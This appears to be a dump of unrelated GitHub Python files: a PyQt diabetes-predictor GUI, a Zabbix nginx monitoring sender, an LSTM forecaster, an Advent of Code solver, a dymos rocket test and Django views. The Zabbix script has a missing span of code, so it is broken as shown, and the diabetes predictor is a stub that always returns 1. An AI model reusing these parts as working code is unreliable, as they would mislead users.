layout.addWidget(self.predict_button)\n\n # Create a central widget and set the layout\n central_widget = QWidget()\n central_widget.setLayout(layout)\n self.setCentralWidget(central_widget)\n\n # Apply stylesheet for visual enhancements\n self.setStyleSheet(\n \"\"\"\n QLabel {\n font-size: 14px;\n color: #333;\n }\n\n QLineEdit {\n font-size: 14px;\n padding: 6px;\n }\n\n QPushButton {\n font-size: 16px;\n padding: 10px;\n background-color: #4CAF50;\n color: white;\n border: none;\n }\n\n QPushButton:hover {\n background-color: #45a049;\n }\n \"\"\"\n )\n\n def predict(self):\n # Fetch input values\n pregnancies = float(self.pregnancies_input.text())\n glucose = float(self.glucose_input.text())\n blood_pressure = float(self.blood_pressure_input.text())\n skin_thickness = float(self.skin_thickness_input.text())\n insulin = float(self.insulin_input.text())\n bmi = float(self.bmi_input.text())\n diabetes_pedigree = float(self.diabetes_pedigree_input.text())\n age = float(self.age_input.text())\n\n # Apply your logistic regression model to predict diabetes here\n # Replace the following line with your model prediction code\n prediction = predict_diabetes(pregnancies, glucose, blood_pressure, skin_thickness,\n insulin, bmi, diabetes_pedigree, age)\n\n # Display the prediction result in a new window\n result_window = QMessageBox(self)\n result_window.setWindowTitle(\"PredictionResult\")\n\n if prediction == 1:\n result_window.setText(\"Prediction: Person has diabetes\")\n else:\n result_window.setText(\"Prediction: Person does not have diabetes\")\n\n result_window.exec_()\n\n\ndef predict_diabetes(pregnancies, glucose, blood_pressure, skin_thickness,\n insulin, bmi, diabetes_pedigree, age):\n # Implement your logistic regression model here\n # You can use your existing model or train a new one using a dataset\n # Replace the following return statement with your model's prediction\n return 1 # Replace this with your model's prediction\n\n","repo_name":"Roodaki/Diabetes-Predictor","sub_path":"IO.py","file_name":"IO.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"43063638348","text":"#!/usr/bin/python3\n\nimport urllib.request, urllib.parse, urllib.error, base64, re, struct, time, socket, datetime, os.path, argparse\n\ntry:\n import json\nexcept:\n import simplejson as json\n\n#####################################################################\n#\n# SETTINGS SECTION\n#\n#####################################################################\n\nzabbix_host = '127.0.0.1' # Zabbix server IP\nzabbix_port = 10051 # Zabbix server port\nhostname = 'Zabbix Agent' # Name of monitored host, like it is shown on Zabbix WebUI\ntime_delta = 1 # grep interval in minutes\n\n# URL to Nginx stat (http_stub_status_module)\nstat_url = 'http://localhost/nginx_stat'\n\n# Optional Basic Auth\nusername = 'user'\npassword = 'pass'\n\n#####################################################################\n#\n# DO NOT CHANGE BEYOND THIS POINT\n#\n#####################################################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"logfile\")\nargs = parser.parse_args()\n\nnginx_log_file_path = args.logfile\nfilename = os.path.basename(nginx_log_file_path)\n\n# Temp file, with log file cursor position\nseek_file = '/tmp/seek_'+filename\n\nclass Metric(object):\n def __init__(self, host, key, value, clock=None):\n self.host = host\n self.key = key\n self.value = value\n 
self.clock = clock\n\n def __repr__(self):\n if self.clock is None:\n return 'Metric(%r, %r, %r)' % (self.host, self.key, self.value)\n return 'Metric(%r, %r, %r, %r)' % (self.host, self.key, self.value, self.clock)\n\n\ndef send_to_zabbix(metrics, zabbix_host='127.0.0.1', zabbix_port=10051):\n metrics_data = []\n for m in metrics:\n clock = m.clock or ('%d' % time.time())\n data = {\n \"host\": m.host,\n \"key\": m.key,\n \"value\": m.value,\n \"clock\": clock\n }\n metrics_data.append(data)\n\n data_json = {\n \"request\": \"sender data\",\n \"data\": metrics_data\n }\n HEADER = \"ZBXD\\1\"\n data_json_str = json.dumps(data_json)\n data_len = len(data_json_str)\n data_header = struct.pack(' seek:\n nf.seek(seek)\n\nline = nf.readline()\nwhile line:\n if d in line:\n new_seek = nf.tell()\n total_rps += 1\n match = re.match(r'.*:(\\d+)\\s.*\"(\\w+)\\s.*\"\\s(\\d*)\\s.*(\\d+\\.\\d+)\\s(\\d+\\.\\d+)\\s\\.', line)\n sec = int(match.group(1))\n req = match.group(2)\n code = match.group(3)\n req_time[req].append(float(match.group(4))) if req in req_time else req_time['OTHER'].append(\n float(match.group(4)))\n res_time[req].append(float(match.group(5))) if req in res_time else res_time['OTHER'].append(\n float(match.group(4)))\n if code in res_code:\n res_code[code] += 1\n else:\n res_code[code] = 1\n\n rps[sec] += 1\n line = nf.readline()\n\nif total_rps != 0:\n write_seek(seek_file, str(new_seek))\n\nnf.close()\n\ndata_to_send = []\n\n# Adding the metrics to response\ndata = get(stat_url, username, password).decode().split('\\n')\ndata = parse_nginx_stat(data)\n\nfor i in data:\n data_to_send.append(Metric(hostname, ('nginx.%s[%s]' % (i, filename)), data[i]))\n\n# Adding the request per seconds to response\nfor t in range(0, 60):\n data_to_send.append(Metric(hostname, ('nginx.rps[%s]' % filename), rps[t], minute + t))\n\n# Adding the response codes stats to response\nfor t in res_code:\n data_to_send.append(Metric(hostname, ('nginx.responses[%s,%s]' % (filename, t)), res_code[t]))\n\n# Calculating the average request handling times and adding to response\nreq_time = {x: sum(req_time[x]) / float(len(req_time[x])) for x in req_time if len(req_time[x]) > 0}\nfor t in req_time:\n data_to_send.append(Metric(hostname, ('nginx.avg_req[%s,%s]' % (filename, t)), req_time[t]))\n\n# Calculating the average upstream response times and adding to response\nres_time = {x: sum(res_time[x]) / float(len(res_time[x])) for x in res_time if len(res_time[x]) > 0}\nfor t in res_time:\n data_to_send.append(Metric(hostname, ('nginx.avg_res[%s,%s]' % (filename, t)), res_time[t]))\n\nsend_to_zabbix(data_to_send, zabbix_host, zabbix_port)\n","repo_name":"lamaral/zbx_custom_templates","sub_path":"zbx_nginx_template/zbx_nginx_stats.py","file_name":"zbx_nginx_stats.py","file_ext":"py","file_size_in_byte":7319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33639468099","text":"import h5py\nimport os\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport meshio\n\ndef main(folder):\n\n # Mesh\n mesh = meshio.read(\"../cell_meshes/bird/hole_coarse.xdmf\")\n\n # Simulated Data\n u_file = h5py.File(os.path.join(folder, \"u.h5\"), 'r')\n u_sim = u_file['VisualisationVector']['0'][()]\n u_sim = np.array(u_sim)\n u_sim_mag = np.sum(u_sim**2, axis=1)**0.5\n\n # Experimental data\n u_data = pd.read_csv(\"./output/single_field/coarse/interpolated_data.csv\", index_col=False)\n u_data = -1*u_data.loc[:,'u':'w'].to_numpy()\n u_data_mag = np.sum(u_data**2, 
axis=1)**0.5\n\n    # Degradation\n    degradation = np.zeros(u_sim.shape[0])\n    discrepancy = u_data_mag-u_sim_mag\n    max_d = np.max(discrepancy)\n    # print(max_d)\n    # degradation = discrepancy * 0.999/4\n\n    Dmax = 0.9\n    degradation = np.zeros(u_sim.shape[0])\n    discrepancy = u_data_mag-u_sim_mag\n    pos_ind = np.where(discrepancy>=0)[0] # underestimation\n    dpos = discrepancy[pos_ind]\n    neg_ind = np.where(discrepancy<0)[0] # overestimation\n    dneg = discrepancy[neg_ind]\n\n    degradation[pos_ind] = dpos * -0.5/5\n    print(degradation)\n    # degradation[neg_ind] = dneg_scaled\n    degradation[neg_ind] = 0\n\n    mesh_out = meshio.Mesh(\n        mesh.points,\n        mesh.cells,\n        point_data = {\"degradation\":degradation}\n    )\n\n    mesh_out.write(\n        os.path.join(folder, \"degradation.xdmf\")\n    )\n\n    np.savetxt(os.path.join(folder, \"degradation.txt\"), degradation)\n\nif __name__==\"__main__\":\n    parser = argparse.ArgumentParser(description=\"Postprocessing\")\n    parser.add_argument('directory', metavar='d', type=str,\n                    help=\"directory containing outputfiles\")\n\n    args = parser.parse_args()\n    main(args.directory)\n","repo_name":"jdsteinman/Gel-Model","sub_path":"cell_simulation/degradation.py","file_name":"degradation.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35199902130","text":"import os\n\n#processing data\ndef process_data(array: list):\n    lenght = len(array)\n    array.sort()\n    average = sum(array) / len(array)\n    if lenght == 1:\n        median = array[0]\n    else:\n        median = array[lenght // 2]  # middle element of the sorted list (upper middle for even lengths)\n    quartil1 = array[lenght // 4]\n    quartil3 = array[(lenght // 4) * 3]\n\n    return average, array[0], quartil1, median, quartil3, array[lenght - 1]\n\n\nDATASETS = \"../dataset/\"\nfor directory in os.listdir(DATASETS):\n    if directory != \"processed_data\":\n        for subdirectory in os.listdir(f\"{DATASETS}{directory}\"):\n            proc_data = []\n            for file in os.listdir(f\"{DATASETS}{directory}/{subdirectory}\"):\n                if \".txt\" in file:\n                    with open(f\"{DATASETS}{directory}/{subdirectory}/{file}\", 'r') as data:\n                        array_of_data = [int(rows.rstrip()) for rows in data]\n                        # print(file)\n                        proc_data.append([int(file[:-4]), process_data(array_of_data)])\n            # print(proc_data)\n\n            proc_data = sorted(proc_data, key=lambda x: x[0])\n            # print(proc_data)\n            with open(f\"{DATASETS}processed_data/{directory}_{subdirectory}.txt\", 'w') as outputfile:\n                for proc in proc_data:\n                    #Write column of size of the input data\n                    outputfile.write(\"\".join(str(proc[0])) + \" \")\n                    #Write columns with these:\n                    #average, minimum, lowerquartile, median, upperquartile, maximum\n                    outputfile.write(\" \".join(map(str, proc[1])) + \"\\n\")","repo_name":"AleksandrKozyrnovD/Bauman_S2","sub_path":"scripts/make_preproc.py","file_name":"make_preproc.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2277484399","text":"import RPi.GPIO as GPIO\nimport sys\nfrom time import sleep\nGPIO.setmode(GPIO.BCM)\ndac = [26, 19, 13, 6, 5, 11, 9, 10]\nleds = [21, 20, 16, 12, 7, 8, 25, 24]\ncomp = 4\ntroyka = 17\nGPIO.setup(dac, GPIO.OUT)\nGPIO.setup(leds, GPIO.OUT)\nGPIO.setup(troyka, GPIO.OUT, initial = 1)\nGPIO.setup(comp, GPIO.IN)\n\ndef perevod(a):\n    return[int(elem) for elem in bin(a)[2:].zfill(8)]\n\ndef adc():\n    k = [0 for i in range(8)]\n    for i in range(8):\n        k_k = k.copy()\n        k_k[i] = 1\n        GPIO.output(dac, k_k)\n        sleep(0.05)\n        if GPIO.input(comp) == 1:\n            k = k_k\n    n = 
''.join([str(i) for i in k])\n return int(n, 2)\n\ntry:\n while True:\n k = adc()\n print(k, \"{0:.2f}B\".format(int(k)/255 * 3.3))\n v = int(k)/255 * 3.3\n v = v / 3.28\n v = v * 8\n v = round(v)\n print(v)\n GPIO.output(leds, 0)\n for i in range(v):\n GPIO.output(leds[i], 1)\n\n\n\nfinally:\n GPIO.output(dac, 0)\n GPIO.cleanup()","repo_name":"KiraKolinko/get","sub_path":"5-3-adc-volume.py","file_name":"5-3-adc-volume.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12130941055","text":"__author__ = 'zyt'\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param {ListNode} head\n # @return {ListNode}\n def reverseList(self, head):\n if not head:\n return None\n now = head.next\n head.next = None # must close the list !!\n while now:\n tail = now.next\n now.next = head\n head = now\n now = tail\n return head\n\nnode = ListNode(1)\n# node.next=ListNode(2)\nprint(Solution().reverseList(node))\n","repo_name":"zhuyingtao/leetcode","sub_path":"LeetCode_Python/Test206.py","file_name":"Test206.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14725063970","text":"# imports\nfrom pandas import read_csv\nimport numpy\nimport math\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\n\n\n# convert an array of values into a dataset matrix\ndef create_dataset(dataset, look_back=1):\n dataX, dataY = [], []\n for i in range(len(dataset)-look_back-3):\n a = dataset[i:(i+look_back), 0]\n b = dataset[(i+look_back):(i+look_back+3), 0]\n dataX.append(a)\n dataY.append(b)\n return numpy.array(dataX), numpy.array(dataY)\n\n\n# code starts from here\ndataframe = read_csv('real_data.csv', usecols=[1], engine='python')\ndataset = dataframe.values\ndataset = dataset.astype('float32')\nprint(dataset)\n\n# scaler\nscaler = MinMaxScaler(feature_range=(0, 1))\ndataset = scaler.fit_transform(dataset)\n\n# split into train and test sets\ntrain_size = int(len(dataset) * 0.67)\ntest_size = len(dataset) - train_size\ntrain, test = dataset[0:train_size, :], dataset[train_size:len(dataset), :]\nprint(len(train), len(test))\n\n\n# reshape into X=t and Y=t+1\nlook_back = 3\ntrainX, trainY = create_dataset(train, look_back)\nprint('trainY: ',trainY)\ntestX, testY = create_dataset(test, look_back)\n\n# reshape input to be [samples, time steps, features]\ntrainX = numpy.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))\ntestX = numpy.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\n\n# create and fit the LSTM network\nmodel = Sequential()\nmodel.add(LSTM(100, input_shape=(1, look_back)))\nmodel.add(Dense(3))\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nmodel.fit(trainX, trainY, epochs=100, batch_size=1, verbose=2)\n\nmodel.save('new_lstm.h5')\n\n# make predictions\ntrainPredict = model.predict(trainX)\ntestPredict = model.predict(testX)\n# invert predictions\ntestPredict = scaler.inverse_transform(testPredict)\n\nprint(testPredict)\n\n","repo_name":"nuwanjkit/timeseries_multiple_output_lstm","sub_path":"lstm_me.py","file_name":"lstm_me.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"72617532967","text":"def 
occurences(food_list):\n '''\n Get ingredient with allergen occurences, ingredient occurences, and allergen occurences.\n\n Both ingredient with allergen occurences and allergen occurences\n will be used to identify ingredients without allergens.\n\n Ingredient occurences will be used to sum number of times\n ingredients without allergens appear in any food.\n '''\n ingredient_occurences = {}\n allergen_occurences = {}\n ingredient_allergen_occurences = {}\n\n for food in food_list:\n if '(' in food:\n ingredients, allergens = food.split(' (')\n allergens = allergens.replace('contains ', '').replace(')', '').split(', ')\n\n for a in allergens:\n allergen_occurences.setdefault(a, 0)\n allergen_occurences[a] += 1\n\n else:\n ingredients, allergens = food, []\n\n ingredients = ingredients.split(' ')\n\n for i in ingredients:\n allergen_count = ingredient_allergen_occurences.setdefault(i, {})\n\n for a in allergens:\n allergen_count.setdefault(a, 0)\n allergen_count[a] += 1\n\n ingredient_occurences.setdefault(i, 0)\n ingredient_occurences[i] += 1\n\n return ingredient_allergen_occurences, ingredient_occurences, allergen_occurences\n\n\ndef ingredients_without_allergens(ingredients_and_allergen, allergen_occurences):\n '''\n For any tentative allergen per ingredient,\n if said allergen's occurence doesn't match the total allergen's occurences,\n said ingredient likely isn't an allergen.\n So we pop said allergen from said ingredient's tentative allergen occurence.\n\n Example: if ingredient 'asdasdasd' has {'dairy': 1} and allergen_occurences['dairy'] == 3,\n likely 'asdasdasd' isn't a dairy allergen.\n So we pop 'dairy' from the tentative allergen occurence of 'asdasdasd'\n\n If the ingredient ends up without any allergen occurences, append to no_allergens.\n '''\n\n no_allergens = []\n\n for i, a in ingredients_and_allergen.items():\n for allergen, count in allergen_occurences.items():\n if allergen in a and a[allergen] != count:\n a.pop(allergen)\n\n if not a:\n no_allergens.append(i)\n\n return no_allergens\n\n\ndef sort_ingredients_by_allergen(ingredients_and_allergen, without_allergens):\n\n # Remove ingredients without allergens\n # from the original ingredients_and_allergen\n for i in no_allergens:\n ingredients_and_allergen.pop(i)\n\n # The allergen occurence isn't important,\n # so make it a list of allergens instead\n for i, a in ingredients_and_allergen.items():\n ingredients_and_allergen[i] = list(a.keys())\n\n # As per instruction, each allergen is only found in one ingredient\n # and ingredients have 0 or 1 allergen(s).\n # General concept:\n # Loop through each ingredient and get the allergens.\n # If only one allergen, remove said allergen from\n # the possible allergens in other ingredients.\n # Let's hope this works.\n while not all(len(a) == 1 for a in ingredients_and_allergen.values()):\n for i, a in ingredients_and_allergen.items():\n if len(a) == 1:\n ingredient = a[0]\n for i2, a in ingredients_and_allergen.items():\n if i != i2 and ingredient in a:\n a.remove(ingredient)\n\n return ','.join(sorted(ingredients_and_allergen.keys(), key=lambda i: ingredients_and_allergen[i][0]))\n\nif __name__ == '__main__':\n test = [\n 'mxmxvkd kfcds sqjhc nhms (contains dairy, fish)',\n 'trh fvjkl sbzzf mxmxvkd (contains dairy)',\n 'sqjhc fvjkl (contains soy)',\n 'sqjhc mxmxvkd sbzzf (contains fish)'\n ]\n\n ingredients_and_allergen, ingredient_occurences, allergen_occurences = occurences(test)\n no_allergens = ingredients_without_allergens(\n ingredients_and_allergen, 
allergen_occurences\n )\n assert sum(c for i, c in ingredient_occurences.items() if i in no_allergens) == 5\n\n assert sort_ingredients_by_allergen(ingredients_and_allergen, no_allergens) == 'mxmxvkd,sqjhc,fvjkl'\n\n with open('inputs/day21.txt') as f:\n food_list = [l.strip() for l in f.readlines() if l.strip()]\n ingredients_and_allergen, ingredient_occurences, allergen_occurences = occurences(food_list)\n no_allergens = ingredients_without_allergens(\n ingredients_and_allergen, allergen_occurences\n )\n\n assert sum(c for i, c in ingredient_occurences.items() if i in no_allergens) == 2075\n assert sort_ingredients_by_allergen(ingredients_and_allergen, no_allergens) == 'zfcqk,mdtvbb,ggdbl,frpvd,mgczn,zsfzq,kdqls,kktsjbh'\n\n","repo_name":"dnswrsrx/adventofcode2k20","sub_path":"day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9345674600","text":"import unittest\nfrom collections import namedtuple\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nimport openmdao.api as om\nfrom openmdao.utils.assert_utils import assert_near_equal\nfrom openmdao.utils.testing_utils import use_tempdirs, require_pyoptsparse\n\nfrom dymos.examples.water_rocket.phases import (new_water_rocket_trajectory,\n set_sane_initial_guesses)\n\n\n@require_pyoptsparse(optimizer='IPOPT')\n@use_tempdirs\nclass TestWaterRocketForDocs(unittest.TestCase):\n\n def test_water_rocket_height_for_docs(self):\n import dymos as dm\n p = om.Problem(model=om.Group())\n\n traj, phases = new_water_rocket_trajectory(objective='height')\n traj = p.model.add_subsystem('traj', traj)\n\n p.driver = om.pyOptSparseDriver(optimizer='IPOPT', print_results=False)\n p.driver.opt_settings['print_level'] = 0\n p.driver.opt_settings['max_iter'] = 500\n p.driver.opt_settings['mu_strategy'] = 'monotone'\n p.driver.declare_coloring(tol=1.0E-12)\n\n # Finish Problem Setup\n p.model.linear_solver = om.DirectSolver()\n\n p.setup()\n set_sane_initial_guesses(p, phases)\n\n dm.run_problem(p, run_driver=True, simulate=True)\n\n summary = summarize_results(p)\n for key, entry in summary.items():\n print(f'{key}: {entry.value:6.4f} {entry.unit}')\n\n exp_out = traj.simulate(times_per_seg=10)\n\n # NOTE: only the last figure is shown in the generated docs\n plot_propelled_ascent(p, exp_out)\n plot_trajectory(p, exp_out)\n plot_states(p, exp_out)\n\n # plt.show()\n\n # Check results (tolerance is relative unless value is zero)\n assert_near_equal(summary['Launch angle'].value, 85, 0.01)\n assert_near_equal(summary['Empty mass'].value, 0.144, 0.01)\n assert_near_equal(summary['Water volume'].value, 0.98, 0.01)\n assert_near_equal(summary['Maximum height'].value, 53.5, 0.01)\n\n def test_water_rocket_range_for_docs(self):\n p = om.Problem(model=om.Group())\n\n traj, phases = new_water_rocket_trajectory(objective='range')\n traj = p.model.add_subsystem('traj', traj)\n\n p.driver = om.pyOptSparseDriver(optimizer='IPOPT')\n p.driver.opt_settings['print_level'] = 0\n p.driver.opt_settings['max_iter'] = 300\n p.driver.opt_settings['mu_strategy'] = 'monotone'\n p.driver.declare_coloring(tol=1.0E-12)\n\n # Finish Problem Setup\n p.model.linear_solver = om.DirectSolver()\n\n p.setup()\n set_sane_initial_guesses(p, phases)\n\n p.run_driver()\n\n summary = summarize_results(p)\n for key, entry in summary.items():\n print(f'{key}: {entry.value:6.4f} {entry.unit}')\n\n exp_out = 
traj.simulate(times_per_seg=10)\n\n # NOTE: only the last figure is shown in the generated docs\n plot_propelled_ascent(p, exp_out)\n plot_trajectory(p, exp_out)\n plot_states(p, exp_out)\n\n # plt.show()\n\n # Check results (tolerance is relative unless value is zero)\n assert_near_equal(summary['Launch angle'].value, 46, 0.02)\n assert_near_equal(summary['Flight angle at end of propulsion'].value, 38, 0.02)\n assert_near_equal(summary['Empty mass'].value, 0.189, 1e-2)\n assert_near_equal(summary['Water volume'].value, 1.026, 1e-2)\n assert_near_equal(summary['Maximum range'].value, 85.11, 1e-2)\n assert_near_equal(summary['Maximum height'].value, 23.08, 1e-2)\n assert_near_equal(summary['Maximum velocity'].value, 41.31, 1e-2)\n\n\ndef plot_trajectory(p, exp_out):\n fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(6, 8))\n\n time_imp = {'ballistic_ascent': p.get_val('traj.ballistic_ascent.timeseries.time'),\n 'propelled_ascent': p.get_val('traj.propelled_ascent.timeseries.time'),\n 'descent': p.get_val('traj.descent.timeseries.time')}\n\n time_exp = {'ballistic_ascent': exp_out.get_val('traj.ballistic_ascent.timeseries.time'),\n 'propelled_ascent': exp_out.get_val('traj.propelled_ascent.timeseries.time'),\n 'descent': exp_out.get_val('traj.descent.timeseries.time')}\n\n r_imp = {'ballistic_ascent': p.get_val('traj.ballistic_ascent.timeseries.r'),\n 'propelled_ascent': p.get_val('traj.propelled_ascent.timeseries.r'),\n 'descent': p.get_val('traj.descent.timeseries.r')}\n\n r_exp = {'ballistic_ascent': exp_out.get_val('traj.ballistic_ascent.timeseries.r'),\n 'propelled_ascent': exp_out.get_val('traj.propelled_ascent.timeseries.r'),\n 'descent': exp_out.get_val('traj.descent.timeseries.r')}\n\n h_imp = {'ballistic_ascent': p.get_val('traj.ballistic_ascent.timeseries.h'),\n 'propelled_ascent': p.get_val('traj.propelled_ascent.timeseries.h'),\n 'descent': p.get_val('traj.descent.timeseries.h')}\n\n h_exp = {'ballistic_ascent': exp_out.get_val('traj.ballistic_ascent.timeseries.h'),\n 'propelled_ascent': exp_out.get_val('traj.propelled_ascent.timeseries.h'),\n 'descent': exp_out.get_val('traj.descent.timeseries.h')}\n\n axes.plot(r_imp['propelled_ascent'], h_imp['propelled_ascent'], 'ro', markerfacecolor='None')\n axes.plot(r_imp['ballistic_ascent'], h_imp['ballistic_ascent'], 'mo', markerfacecolor='None')\n axes.plot(r_imp['descent'], h_imp['descent'], 'bo', markerfacecolor='None')\n\n axes.plot(r_exp['propelled_ascent'], h_exp['propelled_ascent'], 'r-')\n axes.plot(r_exp['ballistic_ascent'], h_exp['ballistic_ascent'], 'm-')\n axes.plot(r_exp['descent'], h_exp['descent'], 'b-')\n\n axes.set_xlabel('r (m)')\n axes.set_ylabel('h (m)')\n axes.set_aspect('equal', 'box')\n\n fig.tight_layout()\n\n\ndef plot_states(p, exp_out):\n fig, axes = plt.subplots(nrows=4, ncols=1, figsize=(4, 8), sharex=True)\n\n states = ['r', 'h', 'v', 'gam']\n units = ['m', 'm', 'm/s', 'deg']\n phases = ['propelled_ascent', 'ballistic_ascent', 'descent']\n\n time_imp = {'ballistic_ascent': p.get_val('traj.ballistic_ascent.timeseries.time'),\n 'propelled_ascent': p.get_val('traj.propelled_ascent.timeseries.time'),\n 'descent': p.get_val('traj.descent.timeseries.time')}\n\n time_exp = {'ballistic_ascent': exp_out.get_val('traj.ballistic_ascent.timeseries.time'),\n 'propelled_ascent': exp_out.get_val('traj.propelled_ascent.timeseries.time'),\n 'descent': exp_out.get_val('traj.descent.timeseries.time')}\n\n x_imp = {phase: {state: p.get_val(f\"traj.{phase}.timeseries.{state}\", unit)\n for state, unit in zip(states, 
units)\n }\n for phase in phases\n }\n\n x_exp = {phase: {state: exp_out.get_val(f\"traj.{phase}.timeseries.{state}\", unit)\n for state, unit in zip(states, units)\n }\n for phase in phases\n }\n\n for i, (state, unit) in enumerate(zip(states, units)):\n axes[i].set_ylabel(f\"{state} ({unit})\" if state != 'gam' else f'$\\gamma$ ({unit})')\n\n axes[i].plot(time_imp['propelled_ascent'], x_imp['propelled_ascent'][state], 'ro', markerfacecolor='None')\n axes[i].plot(time_imp['ballistic_ascent'], x_imp['ballistic_ascent'][state], 'mo', markerfacecolor='None')\n axes[i].plot(time_imp['descent'], x_imp['descent'][state], 'bo', markerfacecolor='None')\n axes[i].plot(time_exp['propelled_ascent'], x_exp['propelled_ascent'][state], 'r-', label='Propelled Ascent')\n axes[i].plot(time_exp['ballistic_ascent'], x_exp['ballistic_ascent'][state], 'm-', label='Ballistic Ascent')\n axes[i].plot(time_exp['descent'], x_exp['descent'][state], 'b-', label='Descent')\n\n if state == 'gam':\n axes[i].yaxis.set_major_locator(mpl.ticker.MaxNLocator(nbins='auto', steps=[1, 1.5, 3, 4.5, 6, 9, 10]))\n axes[i].set_yticks(np.arange(-90, 91, 45))\n\n axes[i].set_xlabel('t (s)')\n axes[0].legend()\n\n fig.tight_layout()\n\n\ndef plot_propelled_ascent(p, exp_out):\n fig, ax = plt.subplots(5, 1, sharex=True, figsize=(4, 8))\n t_imp = p.get_val('traj.propelled_ascent.timeseries.time', 's')\n t_exp = exp_out.get_val('traj.propelled_ascent.timeseries.time', 's')\n\n ax[0].plot(t_imp, p.get_val('traj.propelled_ascent.timeseries.p', 'bar'), 'ro', markerfacecolor='None')\n ax[0].plot(t_exp, exp_out.get_val('traj.propelled_ascent.timeseries.p', 'bar'), 'r-')\n ax[0].set_ylabel('p (bar)')\n ax[0].set_ylim(bottom=0)\n\n ax[1].plot(t_imp, p.get_val('traj.propelled_ascent.timeseries.V_w', 'L'), 'ro', markerfacecolor='None')\n ax[1].plot(t_exp, exp_out.get_val('traj.propelled_ascent.timeseries.V_w', 'L'), 'r-')\n ax[1].set_ylabel('$V_w$ (L)')\n ax[1].set_ylim(0, p.get_val('traj.parameters:V_b', 'L')[0])\n\n ax[2].plot(t_imp, p.get_val('traj.propelled_ascent.timeseries.T', 'N'), 'ro', markerfacecolor='None')\n ax[2].plot(t_exp, exp_out.get_val('traj.propelled_ascent.timeseries.T', 'N'), 'r-')\n ax[2].set_ylabel('T (N)')\n ax[2].set_ylim(bottom=0)\n\n ax[3].plot(t_imp, p.get_val('traj.propelled_ascent.timeseries.v', 'm/s'), 'ro', markerfacecolor='None')\n ax[3].plot(t_exp, exp_out.get_val('traj.propelled_ascent.timeseries.v', 'm/s'), 'r-')\n ax[3].set_ylabel('v (m/s)')\n ax[3].set_ylim(bottom=0)\n\n ax[4].plot(t_imp, p.get_val('traj.propelled_ascent.timeseries.gam', 'deg'), 'ro', markerfacecolor='None')\n ax[4].plot(t_exp, exp_out.get_val('traj.propelled_ascent.timeseries.gam', 'deg'), 'r-')\n ax[4].set_ylabel('$\\gamma$ (deg)')\n ax[4].yaxis.set_major_locator(mpl.ticker.MaxNLocator(nbins='auto', steps=[1, 1.5, 3, 4.5, 6, 9, 10]))\n\n ax[-1].set_xlabel('t (s)')\n\n fig.tight_layout()\n\n\ndef summarize_results(water_rocket_problem):\n p = water_rocket_problem\n Entry = namedtuple('Entry', 'value unit')\n summary = {\n 'Launch angle': Entry(p.get_val('traj.propelled_ascent.timeseries.gam', units='deg')[0, 0], 'deg'),\n 'Flight angle at end of propulsion': Entry(p.get_val('traj.propelled_ascent.timeseries.gam',\n units='deg')[-1, 0], 'deg'),\n 'Empty mass': Entry(p.get_val('traj.parameters:m_empty', units='kg')[0], 'kg'),\n 'Water volume': Entry(p.get_val('traj.propelled_ascent.timeseries.V_w', 'L')[0, 0], 'L'),\n 'Maximum range': Entry(p.get_val('traj.descent.timeseries.r', units='m')[-1, 0], 'm'),\n 'Maximum height': 
Entry(p.get_val('traj.ballistic_ascent.timeseries.h', units='m')[-1, 0], 'm'),\n        'Maximum velocity': Entry(p.get_val('traj.propelled_ascent.timeseries.v', units='m/s')[-1, 0], 'm/s'),\n    }\n\n    return summary\n\n\nif __name__ == '__main__':  # pragma: no cover\n    unittest.main()\n","repo_name":"OpenMDAO/dymos","sub_path":"dymos/examples/water_rocket/test/test_water_rocket.py","file_name":"test_water_rocket.py","file_ext":"py","file_size_in_byte":10803,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"53"} +{"seq_id":"8352265665","text":"#!/usr/bin/python3\ndef search_replace(my_list, search, replace):\n    \"\"\" replaces element in a list \"\"\"\n    if my_list is None:\n        return\n    if my_list.count(search) == 0:\n        return my_list\n    new_list = my_list[:]\n    while new_list.count(search) > 0:\n        idx = new_list.index(search)\n        new_list[idx] = replace\n    return new_list\n","repo_name":"nwamanna/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/1-search_replace.py","file_name":"1-search_replace.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30107882807","text":"from django.shortcuts import render\nfrom .models import *\n\ndef index(request):\n\n    products1 = Product1.objects.all()\n    products2 = Product2.objects.all()\n    products3 = Product3.objects.all()\n    products4 = Product4.objects.all()\n    producttop = ProductTop.objects.all()\n\n    return render(request, 'index.html',{\n        'products1': products1,\n        'products2': products2,\n        'products3': products3,\n        'products4': products4,\n        'producttop': producttop\n\n    })\n\ndef productview(request, pk):\n\n    products1 = Product1.objects.filter(id=pk).all()\n\n\n    return render(request, 'product.html',{\n        'products1': products1,\n\n    })\n\ndef productview2(request, dk):\n    products2 = 